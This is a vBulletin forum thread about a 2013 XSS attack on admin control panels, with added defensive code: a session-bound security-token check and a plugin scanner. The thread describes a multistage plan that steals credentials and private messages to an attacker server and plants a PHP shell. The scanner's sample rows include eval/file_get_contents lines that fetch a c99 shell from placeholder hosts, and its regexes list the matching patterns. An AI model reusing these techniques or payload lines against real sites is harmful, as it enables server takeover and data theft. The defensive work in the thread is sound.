#1
11-18-2013, 05:17 PM
create365
Join Date: Aug 2013
Posts: 15

Recent hacks - exploit discussion

http://www.reddit.com/r/netsec/comme...n_compromises/
I have the exploit code, researching it, also confirmed it works.
On black market, exploit is worth $7000.

Most of the time, it ends up with a C99/PHPShell installed (mostly under Admin CP -> Paid Subscriptions -> Subscriptions Manager, because some users never look there.)

Have you secured your vBulletins, or were you hacked?
How does vBulletin plan to fix it?

Quote:
The XSS script is multistage based on what the user's session is currently capable of.
Create an invisible iframe pointing to the administrator control panel (ACP).
Using the iframe, check if the user is logged into the ACP. If yes, proceed to stage 5, otherwise continue to stage 3.
Since the user was not logged into the ACP, see if a password manager autofills the fields and submit the credentials off to an attacker controlled server. If no credentials were filled, continue to stage 4.
Retrieve all private messages of the user and ship them off to an attacker controlled servers since they might contain credentials or sensitive information. Not much to be done, exit the script.
Since the user was logged into the ACP, attempt to add a vBulletin hook that allows the remote execution of PHP code. If we don't have the permissions for this, continue to stage 6, otherwise exit the script.
Last straw attempt, try changing a higher ranked administrator's password. (yes, vBulletin is stupid enough to allow it) If we don't have the permissions for this either, continue to stage 4, otherwise exit the script.
#2
11-18-2013, 05:27 PM
Zachery
Join Date: Jul 2002
Location: Ontario, Canada
Posts: 11,440

So, you still have to somehow gain access to a semi-privileged account, and then get an administrator to look at the post that has the malicious HTML in it?
#3
11-18-2013, 05:31 PM
create365
Join Date: Aug 2013
Posts: 15

Nope. The attack can be done from any site, but an administrator has to view it. No account on the target forums is needed. It's pretty easy to achieve.
If someone with less privileges enters the page, it does other stuff. As described above, it's multi-stage.
The site, when viewed, opens an invisible iframe and executes the exploit.
Then, if it manages to install the shell, entering a specific URL enables the hacker to access the server almost like via SSH. It allows executing SQL queries, for example to add a new administrator, or even truncate all tables.
#4
11-18-2013, 05:50 PM
Zachery
Join Date: Jul 2002
Location: Ontario, Canada
Posts: 11,440

Still requires sending someone semi-privileged to view the malicious code, and that the user has access to do the things outlined.

I'd like to point out that you can restrict other admins from changing other admins' accounts via the config.php file, as well as lock down admin permissions via a super admin.
#5
11-18-2013, 06:15 PM
Max Taxable
Join Date: Feb 2011
Posts: 3,134

Quote:
The XSS script is multistage based on what the user's session is currently capable of.
Seems like requiring the security token for this POST action stops this cold.
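Max Taxable's point, worked through as an added example that is not vBulletin's own code: a security token bound to the browser session and a time window, and the check an admin-panel POST handler runs before acting (the HMAC scheme, token format, secret and request shape are assumptions of this example). It shows why a cross-site submission that carries the admin's cookie, or a token minted in the attacker's own session, is rejected.

```python
import hashlib
import hmac
import time

# Added example, not vBulletin's code: a security token bound to the session
# and a time window, and the check an ACP POST handler runs before acting.
SERVER_SECRET = b"constructed-example-secret-change-me"  # per-deployment secret
TOKEN_TTL = 3600                                         # seconds a token stays valid

def _mac(session_id, ts):
    msg = f"{session_id}:{ts}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def issue_token(session_id, now=None):
    """Return 'timestamp-mac'; the MAC covers the session id and timestamp."""
    ts = int(time.time() if now is None else now)
    return f"{ts}-{_mac(session_id, ts)}"

def verify_token(session_id, token, now=None):
    """True only for an unexpired token minted for this exact session."""
    if not token or "-" not in token:
        return False
    ts_str, mac = token.split("-", 1)
    if not ts_str.isdigit():
        return False
    ts = int(ts_str)
    current = int(time.time() if now is None else now)
    if not 0 <= current - ts <= TOKEN_TTL:
        return False
    return hmac.compare_digest(_mac(session_id, ts), mac)

def handle_acp_post(request):
    """Gate a state-changing ACP action on the token; 'request' is a constructed
    dict {'cookie_session': str, 'form': {...}} standing in for the HTTP request."""
    token = request["form"].get("securitytoken")
    if not verify_token(request["cookie_session"], token):
        return "403 invalid security token"
    return "200 performed " + request["form"]["do"]

def demo():
    """Three requests that all carry the admin's session cookie."""
    admin, attacker = "sess-admin-constructed", "sess-attacker-constructed"
    legit = {"cookie_session": admin,
             "form": {"do": "addplugin", "securitytoken": issue_token(admin)}}
    # Cross-site submission: the browser attaches the cookie, but the
    # attacker's page cannot read the token to include it.
    forged = {"cookie_session": admin, "form": {"do": "addplugin"}}
    # A token the attacker minted in their own session does not transfer.
    replay = {"cookie_session": admin,
              "form": {"do": "addplugin", "securitytoken": issue_token(attacker)}}
    return [handle_acp_post(r) for r in (legit, forged, replay)]
```

The check defeats the iframe/form-submission path; script already executing in the forum's own origin can read the token from the page, so the token does not replace fixing the HTML injection itself.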
#6
11-18-2013, 06:54 PM
create365
Join Date: Aug 2013
Posts: 15

Quote:
Originally Posted by Zachery View Post
Still requires sending someone semi-privileged to view the malicious code, and that the user has access to do the things outlined.
Well, that is the easiest part.
#7
11-18-2013, 07:35 PM
TheLastSuperman
Senior Member
Join Date: Sep 2008
Location: North Carolina
Posts: 5,844

I've run into this before; I was even worried about it back in September. Remember that PM I sent you, Zachery? It was related to this: the exploit I thought was out there but could not confirm.

What they are doing is base64-encoding the plugins, so it's hard to tell what exactly it's doing... it's always 3-4 plugins, and 3/4 prompt virus alerts from your software (which c99 madshell does, so if the shell script was not on the local server then zing, you guessed it, they connected to it remotely via the plugin, i.e. the anti-virus alert). Basically, instead of uploading c99madshell directly onto the server they are trying to exploit, they simply modified it and uploaded it to their own server; after that the plugin connects to c99 madshell and they execute what they wish from their own server through your site via the plugins. Yet one more reason you don't see all you wish you did in the logs while trying to figure out what just smacked you silly.
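Detection for the pattern TheLastSuperman describes, as an added example that is not vBulletin's code: scan plugin rows for long base64 literals, decode them, and flag eval/decoder calls and fetches of a remote URL. The sample rows, the field names title/hookname/phpcode, and the hosts attacker.example and 203.0.113.5 are constructed for the example.

```python
import base64
import re

# Added example, not vBulletin's code: flag plugin rows whose PHP shows the
# traits described above: base64-wrapped code that is decoded and eval'd, or
# code that pulls the real shell from a remote host. Rows are constructed and
# the field names title/hookname/phpcode are assumed here.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|create_function|base64_decode|gzinflate|gzuncompress|"
    r"str_rot13)\s*\(", re.I)
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|fopen|curl_init|include|include_once|require|"
    r"require_once)\s*\(\s*['\"]?https?://", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")

def decode_blobs(php):
    """Append the decoding of every long base64 literal so the checks also
    see code hidden inside it (one layer; real droppers may nest more)."""
    extra = []
    for blob in B64_BLOB.findall(php):
        try:
            extra.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except ValueError:
            continue
    return php + "\n" + "\n".join(extra)

def scan_plugin(row):
    """Return the reasons a plugin row looks suspicious (empty list = clean)."""
    code = row["phpcode"]
    reasons = []
    if B64_BLOB.search(code):
        reasons.append("long base64 literal")
    expanded = decode_blobs(code)
    if SUSPICIOUS_CALLS.search(expanded):
        reasons.append("eval/decoder call")
    if REMOTE_FETCH.search(expanded):
        reasons.append("fetches remote URL")
    return reasons

def scan_plugins(rows):
    """Map title -> reasons for every row that raised at least one flag."""
    found = {r["title"]: scan_plugin(r) for r in rows}
    return {title: why for title, why in found.items() if why}

# Constructed sample rows; attacker.example and 203.0.113.5 are placeholders.
HIDDEN = base64.b64encode(b"eval(file_get_contents('http://attacker.example/c99.txt'));").decode()
SAMPLE_PLUGINS = [
    {"title": "Fix Avatars", "hookname": "global_start", "phpcode": "$vbulletin->options['x'] = 1;"},
    {"title": "Cache Helper", "hookname": "init_startup", "phpcode": f"eval(base64_decode('{HIDDEN}'));"},
    {"title": "Stats", "hookname": "showthread_complete",
     "phpcode": "$s = file_get_contents('http://203.0.113.5/s.php'); eval($s);"},
]
```

Run it against an export of the plugin table; a hit on a plugin you did not install, or whose hook name fires on every page load, is the row to pull first.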
#8
11-18-2013, 07:37 PM
Digital Jedi
Join Date: Oct 2006
Location: PopCulturalReferenceLand
Posts: 5,171

So your admins should generally be undeletable/unalterable. It's a pain, but it helps.

$7000!?

Seems like all of this could have been avoided if you just used secure passwords.
#9
11-18-2013, 07:59 PM
findingpeace
Join Date: Nov 2011
Posts: 268

This page says the exploit uses HTML in Announcement Titles... Isn't that exactly what happened here on vBulletin.org?
#10
11-18-2013, 08:07 PM
Digital Jedi
Join Date: Oct 2006
Location: PopCulturalReferenceLand
Posts: 5,171

I don't see how, if the dev server attack was non-vBulletin related.
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.